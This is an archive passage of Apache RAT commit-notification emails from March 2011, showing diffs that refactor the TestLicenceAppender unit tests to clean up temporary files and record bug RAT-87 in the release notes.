17:19:34 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 73B5623888BD; Fri, 18 Mar 2011 17:19:11 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1082978 - /incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 18 Mar 2011 17:19:11 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 18 17:19:11 2011 New Revision: 1082978 URL: http://svn.apache.org/viewvc?rev=1082978&view=rev Log: convert unknown type test. RAT-87 Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1082978&r1=1082977&r2=1082978&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 18 17:19:11 2011 @@ -109,17 +109,31 @@ public class TestLicenceAppender extends } public void testAddLicenceToUnknownFile() throws IOException { - String filename = "tmp" + random.nextLong() + ".unknownType"; - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + String filename = qualify("tmp" + random.nextLong() + ".unknownType"); + File file = null; + File newFile = null; + try { + createTestFile(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write("Unkown file type\n"); - writer.close(); + } + }); + file = new File(filename); ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); appender.append(file); - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); + newFile = new File(filename + ".new"); assertFalse("No new file should have been written", newFile.exists()); + } finally { + if (file.exists() && !file.delete()) { + file.deleteOnExit(); + } + if (newFile.exists() && !newFile.delete()) { + newFile.deleteOnExit(); + } + } } public void testAddLicenceToJava() throws IOException { From [email protected] Fri Mar 18 17:22:38 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75403 invoked from network); 18 Mar 2011 17:22:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Mar 2011 17:22:37 -0000 Received: (qmail 84969 invoked by uid 500); 18 Mar 2011 17:22:37 -0000 Delivered-To: [email protected] Received: (qmail 84936 invoked by uid 500); 18 Mar 2011 17:22:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84908 invoked by uid 99); 18 Mar 2011 17:22:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:22:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:22:36 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 144CD23888E7; Fri, 18 Mar 2011 17:22:14 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1082981 - /incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 18 Mar 2011 17:22:14 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 18 17:22:13 2011 New Revision: 1082981 URL: http://svn.apache.org/viewvc?rev=1082981&view=rev Log: get rid of redundancy Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1082981&r1=1082980&r2=1082981&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 18 17:22:13 2011 @@ -59,6 +59,12 @@ public class TestLicenceAppender extends } } + private static void tryToDelete(File f) throws IOException { + if (f != null && f.exists() && !f.delete()) { + f.deleteOnExit(); + } + } + private static void commonTestTemplate(String relativeName, FileCreator creator, NewFileReader reader) @@ -81,14 +87,8 @@ public class TestLicenceAppender extends } } } finally { - File f = new File(name); - if (f.exists() && !f.delete()) { - f.deleteOnExit(); - } - f = new File(name + ".new"); - if (f.exists() && !f.delete()) { - f.deleteOnExit(); - } + tryToDelete(new File(name)); + tryToDelete(new File(name + ".new")); } } @@ -127,12 +127,8 @@ public class TestLicenceAppender extends newFile = new File(filename + ".new"); assertFalse("No new file should have been written", newFile.exists()); } finally { - if (file.exists() && !file.delete()) { - file.deleteOnExit(); - } - if (newFile.exists() && !newFile.delete()) { - newFile.deleteOnExit(); - } + tryToDelete(file); + tryToDelete(newFile); } } From [email protected] Fri Mar 18 17:23:12 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78941 invoked from network); 18 Mar 2011 17:23:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Mar 2011 17:23:12 -0000 Received: (qmail 85809 invoked by uid 500); 18 Mar 2011 17:23:12 -0000 Delivered-To: [email protected] Received: (qmail 85782 invoked by uid 500); 18 Mar 2011 17:23:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85775 invoked by uid 99); 18 Mar 2011 17:23:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:23:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:23:10 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 02CA42388A90; Fri, 18 Mar 2011 17:22:47 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1082983 - /incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 18 Mar 2011 17:22:46 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Mar 18 17:22:46 2011 New Revision: 1082983 URL: http://svn.apache.org/viewvc?rev=1082983&view=rev Log: typo Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1082983&r1=1082982&r2=1082983&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 18 17:22:46 2011 @@ -116,7 +116,7 @@ public class TestLicenceAppender extends createTestFile(filename, new FileCreator() { public void createFile(Writer writer) throws IOException { - writer.write("Unkown file type\n"); + writer.write("Unknown file type\n"); } }); From [email protected] Fri Mar 18 17:38:23 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37297 invoked from network); 18 Mar 2011 17:38:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Mar 2011 17:38:23 -0000 Received: (qmail 13142 invoked by uid 500); 18 Mar 2011 17:38:23 -0000 Delivered-To: [email protected] Received: (qmail 13115 invoked by uid 500); 18 Mar 2011 17:38:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13108 invoked by uid 99); 18 Mar 2011 17:38:23 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:38:23 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:38:22 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 054F423888E7; Fri, 18 Mar 2011 17:37:59 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1082994 - /incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 18 Mar 2011 17:37:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 18 17:37:58 2011 New Revision: 1082994 URL: http://svn.apache.org/viewvc?rev=1082994&view=rev Log: whitespace changes only Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1082994&r1=1082993&r2=1082994&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 18 17:37:58 2011 @@ -29,9 +29,9 @@ import java.util.Random; import junit.framework.TestCase; public class TestLicenceAppender extends TestCase { - /** Used to ensure that temporary files have unq */ - private Random random = new Random(); - + /** Used to ensure that temporary files have unq */ + private Random random = new Random(); + private interface FileCreator { void createFile(Writer w) throws IOException; } @@ -108,194 +108,200 @@ public class TestLicenceAppender extends }; } - public void testAddLicenceToUnknownFile() throws IOException { - String filename = qualify("tmp" + random.nextLong() + ".unknownType"); - File file = null; - File newFile = null; - try { - createTestFile(filename, new FileCreator() { + public void testAddLicenceToUnknownFile() throws IOException { + String filename = qualify("tmp" + random.nextLong() + + ".unknownType"); + File file = null; + File newFile = null; + try { + createTestFile(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write("Unknown file type\n"); + } + }); + + file = new File(filename); + ApacheV2LicenceAppender appender = + new ApacheV2LicenceAppender(); + appender.append(file); + + newFile = new File(filename + ".new"); + assertFalse("No new file should have been written", + newFile.exists()); + } finally { + tryToDelete(file); + tryToDelete(newFile); + } + } + + public void testAddLicenceToJava() throws IOException { + String filename = "tmp.java"; + final String firstLine = "package foo;"; + String secondLine = "/*"; + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write(firstLine + "\n"); + writer.write("\n"); + writer.write("public class test {\n"); + writer.write("}\n"); + } + }, + checkLines(firstLine, secondLine)); + } + + public void testAddLicenceToXML() throws IOException { + String filename = "tmp.xml"; + final String firstLine = "<?xml version='1.0'?>"; + final String secondLine = "<!--"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write(firstLine + "\n"); + writer.write("\n"); + writer.write("<xml>\n"); + writer.write("</xml>\n"); + } + }, + checkLines(firstLine, secondLine)); + } + public void testAddLicenceToHTML() throws IOException { + String filename = "tmp.html"; + String commentLine = "<!--"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write("<html>\n"); + writer.write("\n"); + writer.write("</html>\n"); + } + }, + checkLines(commentLine, null)); + } + + public void testAddLicenceToCSS() throws IOException { + String filename = "tmp.css"; + String firstLine = "/*"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write(".class {\n"); + writer.write(" background-color: red;"); + writer.write("}\n"); + } + }, + checkLines(firstLine, null)); + } + + public void testAddLicenceToJavascript() throws IOException { + String filename = "tmp.js"; + String firstLine = "/*"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write("if (a ==b) {>\n"); + writer.write(" alert(\"how useful!\");"); + writer.write("}\n"); + } + }, + checkLines(firstLine, null)); + } + + public void testAddLicenceToAPT() throws IOException { + String filename = "tmp.apt"; + String firstLine = "~~"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write("A Simple APT file"); + writer.write(" This file contains nothing\n"); + writer.write(" of any importance\n"); + } + }, + checkLines(firstLine, null)); + } + + public void testAddLicenceToProperties() throws IOException { + String filename = "tmp.properties"; + String firstLine = "#"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write("property = value\n"); + writer.write("fun = true\n"); + writer.write("cool = true\n"); + } + }, + checkLines(firstLine, null)); + } + + public void testAddLicenceToScala() throws IOException { + String filename = "tmp.scala"; + final String firstLine = "package foo {"; + final String newFirstLine = "/*"; + + commonTestTemplate(filename, new FileCreator() { public void createFile(Writer writer) throws IOException { - writer.write("Unknown file type\n"); + writer.write(firstLine + "\n"); + writer.write("\n"); + writer.write(" object X { val x = 1; }\n"); + writer.write("}\n"); + } + }, + new NewFileReader() { + public void readFile(BufferedReader reader) + throws IOException { + String line = reader.readLine(); + assertEquals("First line is incorrect", + newFirstLine, line); + while ((line = reader.readLine()) != null) { + if (line.length() == 0) { + line = reader.readLine(); + break; + } + } + assertEquals("Package line is incorrect", + firstLine, line); } }); - - file = new File(filename); - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - newFile = new File(filename + ".new"); - assertFalse("No new file should have been written", newFile.exists()); - } finally { - tryToDelete(file); - tryToDelete(newFile); - } - } - - public void testAddLicenceToJava() throws IOException { - String filename = "tmp.java"; - final String firstLine = "package foo;"; - String secondLine = "/*"; - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write(firstLine + "\n"); - writer.write("\n"); - writer.write("public class test {\n"); - writer.write("}\n"); - } - }, - checkLines(firstLine, secondLine)); - } - - public void testAddLicenceToXML() throws IOException { - String filename = "tmp.xml"; - final String firstLine = "<?xml version='1.0'?>"; - final String secondLine = "<!--"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write(firstLine + "\n"); - writer.write("\n"); - writer.write("<xml>\n"); - writer.write("</xml>\n"); - } - }, - checkLines(firstLine, secondLine)); - } - public void testAddLicenceToHTML() throws IOException { - String filename = "tmp.html"; - String commentLine = "<!--"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write("<html>\n"); - writer.write("\n"); - writer.write("</html>\n"); - } - }, - checkLines(commentLine, null)); - } - - public void testAddLicenceToCSS() throws IOException { - String filename = "tmp.css"; - String firstLine = "/*"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write(".class {\n"); - writer.write(" background-color: red;"); - writer.write("}\n"); - } - }, - checkLines(firstLine, null)); - } - - public void testAddLicenceToJavascript() throws IOException { - String filename = "tmp.js"; - String firstLine = "/*"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write("if (a ==b) {>\n"); - writer.write(" alert(\"how useful!\");"); - writer.write("}\n"); - } - }, - checkLines(firstLine, null)); - } - - public void testAddLicenceToAPT() throws IOException { - String filename = "tmp.apt"; - String firstLine = "~~"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write("A Simple APT file"); - writer.write(" This file contains nothing\n"); - writer.write(" of any importance\n"); - } - }, - checkLines(firstLine, null)); - } - - public void testAddLicenceToProperties() throws IOException { - String filename = "tmp.properties"; - String firstLine = "#"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write("property = value\n"); - writer.write("fun = true\n"); - writer.write("cool = true\n"); - } - }, - checkLines(firstLine, null)); - } - - public void testAddLicenceToScala() throws IOException { - String filename = "tmp.scala"; - final String firstLine = "package foo {"; - final String newFirstLine = "/*"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write(firstLine + "\n"); - writer.write("\n"); - writer.write(" object X { val x = 1; }\n"); - writer.write("}\n"); - } - }, - new NewFileReader() { - public void readFile(BufferedReader reader) - throws IOException { - String line = reader.readLine(); - assertEquals("First line is incorrect", newFirstLine, line); - while ((line = reader.readLine()) != null) { - if (line.length() == 0) { - line = reader.readLine(); - break; - } } - assertEquals("Package line is incorrect", firstLine, line); - } - }); - } - - public void testAddLicenseToRubyWithoutHashBang() throws IOException { - String filename = "tmp.rb"; - String firstLine = "#"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write("class Foo\n"); - writer.write("end\n"); - } - }, - checkLines(firstLine, null)); - } - - public void testAddLicenseToRubyWithHashBang() throws IOException { - String filename = "tmp.rb"; - final String firstLine = "#!/usr/bin/env ruby"; - String secondLine = "#"; - - commonTestTemplate(filename, new FileCreator() { - public void createFile(Writer writer) - throws IOException { - writer.write(firstLine + "\n"); - writer.write("class Foo\n"); - writer.write("end\n"); - } - }, - checkLines(firstLine, secondLine)); - } + + public void testAddLicenseToRubyWithoutHashBang() + throws IOException { + String filename = "tmp.rb"; + String firstLine = "#"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write("class Foo\n"); + writer.write("end\n"); + } + }, + checkLines(firstLine, null)); + } + + public void testAddLicenseToRubyWithHashBang() throws IOException { + String filename = "tmp.rb"; + final String firstLine = "#!/usr/bin/env ruby"; + String secondLine = "#"; + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { + writer.write(firstLine + "\n"); + writer.write("class Foo\n"); + writer.write("end\n"); + } + }, + checkLines(firstLine, secondLine)); + } } From [email protected] Fri Mar 18 17:40:12 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37669 invoked from network); 18 Mar 2011 17:40:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Mar 2011 17:40:12 -0000 Received: (qmail 16280 invoked by uid 500); 18 Mar 2011 17:40:12 -0000 Delivered-To: [email protected] Received: (qmail 16256 invoked by uid 500); 18 Mar 2011 17:40:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16249 invoked by uid 99); 18 Mar 2011 17:40:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:40:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:40:10 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E652023888E7; Fri, 18 Mar 2011 17:39:46 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1082995 - /incubator/rat/main/trunk/RELEASE_NOTES.txt Date: Fri, 18 Mar 2011 17:39:46 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Mar 18 17:39:46 2011 New Revision: 1082995 URL: http://svn.apache.org/viewvc?rev=1082995&view=rev Log: record and close RAT-87 Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt Modified: incubator/rat/main/trunk/RELEASE_NOTES.txt URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/RELEASE_NOTES.txt?rev=1082995&r1=1082994&r2=1082995&view=diff ============================================================================== --- incubator/rat/main/trunk/RELEASE_NOTES.txt (original) +++ incubator/rat/main/trunk/RELEASE_NOTES.txt Fri Mar 18 17:39:46 2011 @@ -4,6 +4,7 @@ RAT 0.8 * Bug: * RAT-86 CLI doesn't allow adding of licenses unless a custom stylesheet has been specified + * RAT-87 Tests could leave temporary files around. * Improvement: * RAT-79 Support automatic addition of license headers to Velocity templates From [email protected] Fri Mar 18 18:03:09 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12781 invoked from network); 18 Mar 2011 18:03:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Mar 2011 18:03:08 -0000 Received: (qmail 8089 invoked by uid 500); 18 Mar 2011 17:36:20 -0000 Delivered-To: [email protected] Received: (qmail 3887 invoked by uid 500); 18 Mar 2011 17:36:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3766 invoked by uid 99); 18 Mar 2011 17:36:05 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:36:05 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=5.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 18 Mar 2011 17:36:02 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B7EBA23888EA; Fri, 18 Mar 2011 17:35:38 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1082993 - /incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Date: Fri, 18 Mar 2011 17:35:38 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: bodewig Date: Fri Mar 18 17:35:38 2011 New Revision: 1082993 URL: http://svn.apache.org/viewvc?rev=1082993&view=rev Log: convert tests to use template methods. RAT-87 Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Modified: incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java URL: http://svn.apache.org/viewvc/incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java?rev=1082993&r1=1082992&r2=1082993&view=diff ============================================================================== --- incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java (original) +++ incubator/rat/main/trunk/apache-rat-core/src/test/java/org/apache/rat/annotation/TestLicenceAppender.java Fri Mar 18 17:35:38 2011 @@ -134,196 +134,128 @@ public class TestLicenceAppender extends public void testAddLicenceToJava() throws IOException { String filename = "tmp.java"; - String firstLine = "package foo;"; + final String firstLine = "package foo;"; String secondLine = "/*"; - - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write(firstLine + "\n"); writer.write("\n"); writer.write("public class test {\n"); writer.write("}\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", firstLine, line); - line = reader.readLine(); - assertEquals("Second line is incorrect", secondLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(firstLine, secondLine)); } public void testAddLicenceToXML() throws IOException { String filename = "tmp.xml"; - String firstLine = "<?xml version='1.0'?>"; - String secondLine = "<!--"; + final String firstLine = "<?xml version='1.0'?>"; + final String secondLine = "<!--"; - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write(firstLine + "\n"); writer.write("\n"); writer.write("<xml>\n"); writer.write("</xml>\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", firstLine, line); - line = reader.readLine(); - assertEquals("Second line is incorrect", secondLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(firstLine, secondLine)); } public void testAddLicenceToHTML() throws IOException { String filename = "tmp.html"; String commentLine = "<!--"; - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write("<html>\n"); writer.write("\n"); writer.write("</html>\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", commentLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(commentLine, null)); } public void testAddLicenceToCSS() throws IOException { String filename = "tmp.css"; String firstLine = "/*"; - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write(".class {\n"); writer.write(" background-color: red;"); writer.write("}\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", firstLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(firstLine, null)); } public void testAddLicenceToJavascript() throws IOException { String filename = "tmp.js"; String firstLine = "/*"; - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write("if (a ==b) {>\n"); writer.write(" alert(\"how useful!\");"); writer.write("}\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", firstLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(firstLine, null)); } public void testAddLicenceToAPT() throws IOException { String filename = "tmp.apt"; String firstLine = "~~"; - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write("A Simple APT file"); writer.write(" This file contains nothing\n"); writer.write(" of any importance\n"); - writer.close(); - - ApacheV2LicenceAppender appender = new ApacheV2LicenceAppender(); - appender.append(file); - - File newFile = new File(System.getProperty("java.io.tmpdir") + File.separator + filename + ".new"); - - BufferedReader reader = new BufferedReader(new FileReader(newFile)); - String line = reader.readLine(); - assertEquals("First line is incorrect", firstLine, line); - - file.delete(); - newFile.delete(); + } + }, + checkLines(firstLine, null)); } public void testAddLicenceToProperties() throws IOException { String filename = "tmp.properties"; String firstLine = "#"; - - File file = new File(System.getProperty("java.io.tmpdir") + File.separator + filename); - FileWriter writer = new FileWriter(file); + + commonTestTemplate(filename, new FileCreator() { + public void createFile(Writer writer) + throws IOException { writer.write("property = value\n"); writer.write("fun = true\n"); 